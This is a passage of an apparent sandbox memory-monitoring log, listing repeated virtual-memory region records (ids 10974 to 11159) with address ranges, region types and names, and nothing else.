name = "pagefile_0x0000000000610000" filename = "" Region: id = 10974 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10975 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10976 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10977 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10978 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10979 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10980 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10981 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10982 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10983 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10984 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10985 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10986 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10987 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10988 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10989 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10990 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10991 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10992 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10993 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10994 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10995 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10996 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10997 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10998 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10999 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11000 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11001 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11002 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11003 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11004 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11005 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11006 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11007 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11008 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 11009 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 11010 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11011 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11012 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11013 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11014 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11015 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11016 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11017 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11018 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11019 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11020 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11021 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11022 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11023 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11024 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11025 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11026 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11027 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11028 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11029 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 11030 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 11031 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11032 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11033 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11034 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 11035 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 11036 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11037 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11038 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11039 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11040 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11041 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11042 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11043 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11044 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11045 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11046 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11047 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11048 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11049 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11050 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11051 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11052 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11053 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11054 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11055 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11056 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11057 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11058 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11059 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11060 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11061 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11062 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11063 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11064 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11065 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11066 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11067 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11068 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11069 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11070 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11071 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11072 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11073 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11074 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11075 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11076 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11077 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11078 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11079 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11080 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11081 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11082 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11083 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11084 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11085 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 11086 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 11087 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11088 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11089 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11090 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11091 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11092 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11093 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11094 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11095 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11096 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11097 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11098 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11099 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11100 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11101 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11102 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11103 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11104 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11105 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11106 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11107 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11108 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11109 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11110 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11111 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11112 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11113 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11114 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11115 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11116 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11117 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11118 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11119 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11120 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11121 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11122 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11123 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11124 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11125 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11126 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11127 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11128 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11129 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11130 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11131 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11132 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11133 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11134 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11135 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11136 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11137 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11138 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11139 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11140 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11141 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11142 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 11143 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 11144 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11145 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11146 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11147 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11148 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 11149 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 11150 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11151 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11152 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 11153 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 11154 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11155 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11156 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11157 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 11158 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 11159 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 